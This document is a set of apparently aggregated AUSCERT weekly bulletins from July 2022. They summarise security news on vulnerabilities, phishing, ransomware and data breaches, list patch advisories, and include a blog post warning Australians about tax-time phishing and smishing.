2022-07-19 Author: Portswigger An unauthenticated arbitrary object instantiation vulnerability in LDAP Account Manager (LAM) has been discovered during an internal penetration test. LAM is a PHP web application for managing entries such as users, groups, or DHCP settings in LDAP directories via a web frontend, and is one of the alternatives to FreeIPA. It’s included in Debian repositories. But a vulnerability discovered by researcher Arseniy Sharoglazov could allow an attacker to create arbitrary objects and achieve remote code execution (RCE) in one request, and without any out-of-band connections. Critical flaws in GPS tracker enable “disastrous” and “life-threatening” hacks Date: 2022-07-20 Author: Ars Technica A security firm and the US government are advising the public to immediately stop using a popular GPS tracking device or to at least minimize exposure to it, citing a host of vulnerabilities that make it possible for hackers to remotely disable cars while they’re moving, track location histories, disarm alarms, and cut off fuel. Log4j vulnerabilities remain 'endemic', says US DHS Date: 2022-07-18 Author: iTnews The US Department of Homeland security has warned that the world is likely to be dealing with the fallout from the Log4j vulnerability for a decade or more. Log4j – also known as Log4shell – is a critical vulnerability in a Java logging library that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems. COVID-19 lockdowns see rise in bank and credit-card fraud as more people work and shop from home Date: 2022-07-18 Author: ABC News One in nine Australians have been victims of personal fraud, with card fraud the most common type due to more people banking and shopping online because of COVID-19. Card fraud is when criminals get a hold of your banking or credit-card details to illegally access your account and steal money. The Australian Bureau of Statistics said 11 per cent of Australians, or more than 2 million people, were victims of personal fraud in 2020-21, compared to 8.5 per cent in 2014-15. Westpac arms itself for cryptocurrency tilt – Finance – Software Date: 2022-07-20 Author: IT News Westpac has given a clear indication of its intent to enter the cryptocurrency and blockchain space, having previously been tight-lipped as to its ambitions. The bank posted an open call for a principal architect for digital assets and cryptocurrency in recent weeks, from which it is clear that Westpac wants to set itself up as a leader in what is is collectively calling “digital assets”. ESB-2022.3563 – Apple Watch Series 3: CVSS (Max): 5.5* Apple released security updates to fix vulnerabilities impacting Apple Watch. Users should upgrade their devices by installing watchOS 8.7. ESB-2022.3559 – macOS Monterey 12.5: CVSS (Max): 7.5* Apple addressed several arbitrary code execution flaws impacting Neural Engine, GPU Drivers, ImageIO, ICU, and Kernel. Users should upgrade their devices by installing macOS Monterey 12.5 ESB-2022.3553 – Safari 15.6: CVSS (Max): None Apple fixed arbitrary code execution issue that was addressed with the release of Safari 15.6: An out-of-bounds write issue was addressed with improved input validation. Safari 15.6 may be obtained from the Mac App Store ESB-2022.3522 – MiCODUS MV720 GPS tracker: CVSS (Max): 9.8 Exploitation of several vulnerabilities could allow an attacker control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff commands, and the disarming of various features (e.g., alarms). MiCODUS has not provided updates or patches to mitigate these vulnerabilities. ESB-2022.3574 – Questions For Confluence: CVSS (Max): None An external party has discovered and publicly disclosed a hardcoded password for Questions for Confluence on Twitter. This issue is likely to be exploited in the wild now that the hardcoded password is publicly known. This vulnerability should be remediated on affected systems immediately. Stay safe, stay patched and have a good weekend! The AUSCERT team

Greetings, Last week in our blog, Staying aware this tax time, we looked at potential risks for individuals in relation to phishing and smishing, specific to Australian tax processes. A recent article from The Conversation expands upon this growing trend, providing examples of methods used by scammers to gain an insight into the lives of potential targets, with their age and social status key data. It goes on to explain that information from social media is making it easier for scammers to create phishing attacks specifically targeting people, due to the abundance of personal information available about them. Increasing global connectivity and our growing reliance on technology are factors that have fuelled the growth of IT/OT convergence. This area is a perpetual work in progress and is discussed in the first episode of Season 2 of our podcast series. Episode 13, features a chat between Anthony Caruana and Lesley Carhart who discuss the intersection between cyber security and operational technology, including the increased risk and vulnerability throughout the industry. Microsoft's July Patch Tuesday fixes actively exploited bug Date: 2022-07-12 Author: The Register [See also: ASB-2022.0137] No, Windows Autopatch didn't kill the monthly patchapalooza PATCH TUESDAY Despite worries that Patch Tuesday may not be as exciting now that Microsoft's Windows Autopatch is live — with a slew of caveats — the second Tuesday of this month arrived with 84 security fixes, including 4 critical bugs and one that's under active exploit. Let's start with the one that miscreants have already found and exploited. CVE-2022-22047 is an elevation of privilege vuln in Windows' Client Server Runtime Subsystem (CSRSS). Microsoft deemed it an "important" security issue, with low complexity and low privileges required to exploit. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," the security advisory explained. Ransomware gang now lets you search their stolen data Date: 2022-07-11 Author: Bleeping Computer Two ransomware gangs and a data extortion group have adopted a new strategy to force victim companies to pay threat actors to not leak stolen data. The new tactic consists in adding a search function on the leak site to make it easier to find victims or even specific details. At least two ransomware operations and a data extortion gang have adopted the strategy recently and more threat actors are likely to do the same. Deakin University reveals breach of 47,000 students' details Date: 2022-07-13 Author: iTnews Subset targeted with smish sent via officially-used SMS channel. Deakin University has revealed a data breach impacting almost 47,000 current and past students, along with a ‘smishing’ attempt that compromised a legitimate communications channel to target 10,000 current students The Victorian university said it had been “targeted in a cyber attack” where a single staff member’s login credentials were compromised. Microsoft details massive phishing operation Date: 2022-07-13 Author: IT News A phishing campaign that has been active since September 2021 has so far attempted to target more than 10,000 organisations, Microsoft security researchers said. The campaign uses what Microsoft calls Adversary in the Middle (AitM) attacks which involves setting up a proxy server that sits between victims and the websites they wish to visit. With a proxy server that intercepts hyper text transfer protocol (HTTP) packets from users, attackers don't need create sites that impersonate legitimate ones, as per traditional phishing campaigns. Australia's major banks look to dynamic CVV to combat payment fraud Date: 2022-07-11 Author: IT News Three of the 'Big Four' Australian banks have turned to dynamic card verification value (CVV) functionality to combat online payment fraud and boost digital consumer protections. The CVC or CVV is traditionally a static, three-digit number found on the back of a physical debit or credit card that acts as an additional layer of verification or security when a customer is transacting online. Vulnerability Spotlight: Adobe Acrobat DC use-after-free issues could lead to arbitrary code execution Date: 2022-07-13 Author: Talos Website [See also ESB-2022.3409] Cisco Talos recently discovered two use-after-free vulnerabilities in Adobe Acrobat Reader DC that could allow an attacker to eventually gain the ability to execute arbitrary code. Acrobat is one of the most popular PDF reader software options available currently. It includes the ability to read and process JavaScript to give PDFs greater interactivity and customization options for users. This vulnerability exists in the way Acrobat Reader processes JavaScript. 1 in 3 untrained employees will click on a phishing link Date: 2022-07-13 Author: Security Brief One in three untrained employees will click on a phishing link, according to a new report from KnowBe4. The security awareness training and simulated phishing platform has released the new 2022 Phishing by Industry Benchmarking Report, which measures an organisation’s Phish-proneTM Percentage (PPP), which indicates how many of their employees are likely to fall for phishing or a social engineering scam. Tech giants want to kill off passwords. Here's why they think passkeys will change the world, and what that means for you Date: 2022-07-14 Author: ABC News Last year, a password management company and a group of researchers found that the most common password in the world was 123456 — they said it showed up more than 103 million times. Second was 123456789. Third was 12345 ASB-2022.0139 – ALERT Windows 7 and Windows Server 2008: CVSS (Max): 8.8* Microsoft's Patch Tuesday included fixes for Windows 7 and Windows Server 2008 ASB-2022.0137 – ALERT Windows: CVSS (Max): 8.8* Microsoft Patch Tuesday updates included a fix for the CVE-2022-22047 actively exploited vulnerability ESB-2022.3409 – Adobe Acrobat DC and Adobe Acrobat Reader DC: CVSS (Max): 7.8 Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS which addressed multiple critical, and important vulnerabilities that could lead to arbitrary code execution and memory leak ESB-2022.3381 – CVSS (Max): 9.8 An update was released for two security issues in the Debian PHP package which could result an denial of service or potentially the execution of arbitrary code Stay safe, stay patched and have a good weekend! The AUSCERT team

Greetings, The second half of 2022 has commenced with a mix of chilly temperatures and wet weather for most of Australia and news that a third wave of the COVID pandemic is increasingly likely. Not wanting to add to the woes of many, we at AUSCERT felt it prudent to share our insights into another potential threat; tax-related scams. In our recent blog, Stay alert this tax time, we highlight two of the more widely used tactics, Phishing and Smishing. By providing examples and what to look out for, we hope to increase awareness and, reduce the success of would-be attackers. Perhaps the Shanghai Police could have been more vigilant in this regard with reports stating the recent attack that resulted in the data of almost one billion people being leaked because of poor security. It is alleged that the system wasn’t hacked but rather, it simply didn’t have a password for over a year. CNN delves into this situation, providing insights into what currently appears to be the largest leak of public information seen. Closer to home, NAIDOC Week 2022 continues and has the theme ‘Get up! Stand up! Show up!’ encourages us all to acknowledge, and celebrate the histories, cultures, and achievements of Aboriginal and Torres Strait Islander people. It is an important annual event where everyone’s invited to join in the celebrations with official celebrations held from July 3-10. Visit the NAIDOC website for news, stories, and information on how you can show your support and help bridge the gap. Verified Twitter accounts hacked to send fake suspension notices Date: 2022-07-02 Author: Bleeping Computer Threat actors are hacking verified Twitter accounts to send fake but well-written suspension messages that attempt to steal other verified users’ credentials. Twitter verifies accounts if they are considered notable influencers, celebrities, politicians, journalists, activists, and government and private organizations. To receive the verified ‘blue badge,’ Twitter users must apply for verification and submit supporting documentation to show why their account is ‘notable.’ Australia offers cyber-security assistance to Ukraine Date: 2022-07-04 Author: Cyber Security Connect Strengthening the cyber resilience of Ukraine’s Border Guard Service forms part of a new assistance package from the Australian government. In response to a request from President Volodymyr Zelenskyy, the Commonwealth government has committed $99.5 million in additional military assistance to Ukraine, including the delivery of 14 M113 armoured personnel carriers and 20 Thales-built Bushmaster protected mobility vehicles. The value of Australia’s military assistance to Ukraine now totals approximately $388 million. Notably, $8.7 million has been pledged to assist Ukraine’s Border Guard Service, tipped to fund upgrades to border management equipment, improvements to cyber security, and enhancements to border operations in the field. Australian businesses lose $227 million to BEC-like scams Date: 2022-07-04 Author: ITnews Australian businesses were scammed out of $227 million in “payment redirection” cons – which includes business email compromise or BEC – over the course of 2021. Payment redirection, as the ACCC groups these scams, caused the highest losses to businesses out of any scam type, according to commission’s latest scam report. Facebook 2FA phish arrives just 28 minutes after scam domain created Date: 2022-07-01 Author: Naked Security We’ll tell this story primarily through the medium of images, because a picture is worth 1024 words. This cybercrime is a visual reminder of three things: It’s easy to fall for a phishing scam if you’re in a hurry. Cybercriminals don’t waste any time getting new scams going. 2FA isn’t a cybersecurity panacea, so you still need your wits about you. Google patches new Chrome zero-day flaw exploited in attacks Date: 2022-07-04 Author: Bleeping Computer [See also ESB-2022.3254] Google has released Chrome 103.0.5060.114 for Windows users to address a high-severity zero-day vulnerability exploited by attackers in the wild, the fourth Chrome zero-day patched in 2022. “Google is aware that an exploit for CVE-2022-2294 exists in the wild.,” the browser vendor explained in a security advisory published on Monday. Poor patching creates easy zero-day vulnerability reuse Date: 2022-07-01 Author: iTnews Google’s elite Project Zero security researchers are again warning that insufficient patching of vulnerabilities means threat actors can vary their methodologies, and reuse software bugs. Project Zero’s Maddie Stone posted a half year report on the zero-day vulnerabilities that are being exploited with no patches available for 2022. Fortinet patch batch remedies multiple path traversal vulnerabilities | The Daily Swig Date: 2022-07-07 Author: Port Swigger Fortinet has addressed a raft of security vulnerabilities affecting several of its endpoint security products. The California-headquartered cybersecurity giant, which accounts for more than a third of all firewall and unified threat management shipments worldwide, released a huge number of firmware and software updates on Tuesday (July 5). Cloud Misconfig Exposes 3TB of Sensitive Airport Data in Amazon S3 Bucket: ‘Lives at Stake’ Date: 2022-07-07 Author: Dark Reading A misconfigured Amazon S3 bucket resulted in 3TB of airport data (more than 1.5 million files) being publicly accessible, open, and without an authentication requirement for access, highlighting the dangers of unsecured cloud infrastructure within the travel sector. The exposed information, uncovered by Skyhigh Security, includes employee personal identification information (PII) and other sensitive company data affecting at least four airports in Colombia and Peru. ESB-2022.3250 – GitLab Community Edition (CE) and Enterprise Edition (EE): CVSS (Max): 9.9 Gitlab released critical security update on versions 15.1.1, 15.0.4, and 14.10.5 for GitLab Community Edition (CE) and Enterprise Edition (EE) ESB-2022.3315 – MozillaFirefox: CVSS (Max): 7.5 MozillaFirefox has released an update that fixes 9 new vulnerabilities ESB-2022.3331 – PHP: CVSS (Max): 9.8 USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem ESB-2022.3325 – Traffix SDC: CVSS (Max): 8.6 A remote attacker may be able to exploit this vulnerability to compromise the data confidentiality, integrity, and availability of the affected system Stay safe, stay patched and have a good weekend! The AUSCERT team

As one financial year ends and another begins, Australians start preparing their tax applications and with it, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer/attacker might use to obtain your personal information such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities depending on the data obtained.   Email phishing Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Tax Office (ATO) or MyGov and sends a phishing email that looks like a legitimate email. The spoofed email address may be difficult to detect when the recipient is using a phone as typically, it does not show the actual email address in full, revealing who it was sent from. a. Email with a Phishing URL Usually, such emails contain a phishing link that when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud. Example of malicious email with a phishing URL   b. Email with a local HTML attachment Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it will link to a phishing form requesting the user enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software. Example of malicious email with an HTML attachment Example of malicious email with an HTML phishing form   Smishing (SMS Phishing) As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. This method is quite simple as the fake texts are disguised to come from a known and trusted source such as a bank or, the ATO. In this instance, a text message with a URL is sent to a phone number pretending to be MyGov. When clicked, the user is redirected to a MyGov phishing page where they are required to enter personal information. Additionally, it could then redirect the user to a secondary phishing page made to look like a bank. Example of malicious phishing link in SMS/Text Message (1) Example of malicious phishing link in SMS/Text Message (2) Example of phishing page (MyGov) Example of phishing page redirecting to secondary phishing page (MyGov to a bank)   It is important to know that ATO or MyGov would not send any email or text message directly to ask for any personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact ATO. If something looks suspicious, be it the spelling, website address or the request within the message, do not click the link or proceed! ATO is a member of AUSCERT and we help ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs) such as email content, and phish page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on the mentioned services can be found at the links below: AUSCERT Malicious URL Feed AUSCERT MISP

Greetings, Today sees us enter the second half of 2022 which, for many of us, seems to have arrived sooner than expected. Something else that has landed quickly is the second season of our podcast series, ‘Share Today, Save Tomorrow’. The first episode of the season features the amazing Lesley Carhart, known to many by her Twitter handle @hacks4Pancakes. Lesley, an industry leader in incident response, chats to Anthony Caruana about the intersection between cyber security and operational technology, including the increased risk and vulnerability throughout the industry. There’s more from our very own Bek and Mike in the episode so be sure to take the time to listen to Episode 13 – ITOT Convergence. Mike and Bek look back at some of their highlights from this year’s conference, AUSCERT2022, which is made a little easier with the recorded sessions from this year’s conference now available! Emails were sent to attendees with the login details so be sure to check your inbox. The OnAir portal will remain open until Friday, 29th July 2022 which should allow plenty of time to revisit your own highlights or, perhaps watch a session that you may have missed. Excitingly, the merchandise from this year’s conference has also been shipped to attendees! As most of us have experienced, shipment times are a tad longer nowadays so, please be patient. We assure you, the wait will be worth it! Lastly, some would say most importantly, next Thursday, July 7, 2022, is World Chocolate Day. From their discovery and use by the Olmecs over 2,500 years ago, cacao beans have been used as currency, turned into a bitter drink and of course, used to make the most popular tasty treat consumed the world over today. Chocolate contains antioxidants and can improve your cardiovascular health and can be enjoyed in seemingly endless ways. So, please do your part and support World Chocolate Day with something made from, dipped in or containing some chocolate! New report finds 101% spike in email threats Date: 2022-07-24 Author: Cyber Security Connect Trend Micro reports that it blocked over 33.6 million cloud email threats in 2021, a 101 per cent increase on the previous year. Trend Micro’s research on the mounting number of cyber risks highlighted that 48 per cent of local organisations don’t believe their method of assessing risk exposure is sophisticated enough, underlining the vulnerability of Australia’s corporate sector to increasingly insidious email threats. Email remains a top point of entry for cyber attacks as demonstrated by this massive increase. Many Australian businesses faced spear-phishing, business email compromise (BEC) and email-based ransomware attacks in 2021. RansomHouse claims AMD hack, 450GB data stolen Date: 2022-07-29 Author: Cyber Security Connect Semiconductor manufacturer AMD is investigating a cyber attack after the RansomHouse gang claimed to have stolen 450GB of data from the company last year. RansomHouse, an extortion group, claims to have stolen 450GB of data from AMD, announcing on Telegram that they would be “selling the data for a well-known three-letter company that starts with the letter A”. The extortion group also added AMD to their data leak site, claiming to have stolen 450GB of data. According to Satnam Narang, senior staff research engineer at Tenable, there has been a renaissance of pure-play extortion groups in recent months. ACSC warns Aussie businesses of tax-time email hacking campaigns Date: 2022-07-28 Author: Cyber Security Connect The Australian Cyber Security Centre (ACSC) is urging Aussies and Australian businesses to strengthen their email security practices to protect their private information and that of their customers in the lead up to tax time. As tax time approaches, the ACSC is encouraging individuals, businesses and organisations to be alert, and aware of business email compromise (BEC) threats. BEC occurs when cyber criminals access email accounts aiming to steal sensitive and financial information or commit fraud by impersonating employees or company email accounts to obtain money or data. Clever phishing method bypasses MFA using Microsoft WebView2 apps Date: 2022-07-26 Author: Bleeping Computer A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victim’s authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts. With the large number of data breaches, remote access trojan attacks, and phishing campaigns, stolen login credentials have become abundant. However, the increasing adoption of multi-factor authentication (MFA) has made it difficult to use these stolen credentials unless the threat actor also has access to the target’s one-time MFA passcodes or security keys. This co-worker does not exist: FBI warns of deepfakes interviewing for tech jobs Date: 2022-07-29 Author: TechCrunch A lot of people are worried about the prospect of competing with AI for their jobs, but this probably isn’t what they were expecting. The FBI has warned of an uptick in cases where “deepfakes” and stolen personal information are being used to apply for jobs in the U.S. — including faking video interviews. Don’t dust off the Voight-Kampff test just yet, though. The shift to remote work is great news for lots of people, but like any other change in methods and expectations it is also a fresh playground for scammers. Security standards are being updated, recruiters are adapting, and of course the labor market is wild enough that hiring companies and applicants both are trying to move faster than ever. Attacker Targets RCE Bug in Mitel MiVoice VoIP Appliances Date: 2022-07-29 Author: Cyware Hacker News Cybercriminals have used a zero-day exploit on Linux-based Mitel MiVoice VoIP appliances. According to researchers, the exploit was used for gaining initial access to an attempted ransomware attack. The zero-day abuse A report from CrowdStrike disclosed that a zero-day RCE flaw (CVE-2022-29499) is present in the Mitel Service Appliance component of MiVoice Connect that was abused to obtain initial access to the network. Although the attack was stopped, the intrusion is suspected to be a part of a ransomware attack. Sophisticated ZuoRAT attack targets home workers Date: 2022-07-30 Author: IT News Security researchers have unearthed a sophisticated campaign that targets consumer-grade routers from multiple manufacturers in Europe and North America. The researchers at security vendor Lumen’s Black Lotus Labs spotted the ZuoRAT multi-stage remote access tool hijacking small business and residential routers from brands such as Cisco, ASUS, DrayTek and Netgear. ESB-2022.3122 – Traffix SDC: CVSS (Max): 7.8 A Linux kernel vulnerability which affects Traffix SDC has been acknowledged by F5. Currently, no mitigation or patches are available ESB-2022.3172.2 – ALERT Tenable.sc: CVSS (Max): 9.8 Tenable has released Tenable.sc patch 202206.1 to address the vulnerabilities in Apache ESB-2022.3152 – Firefox ESR 91.11: CVSS (Max): None Mozilla has updated Firefox ESR to 91.11 to address the security vulnerabilities ESB-2022.3157 – maven-shared-utils: CVSS (Max): 9.8 Debian has released new maven-shared-utils packages to address shell injection attacks Stay safe, stay patched and have a good weekend! The AUSCERT team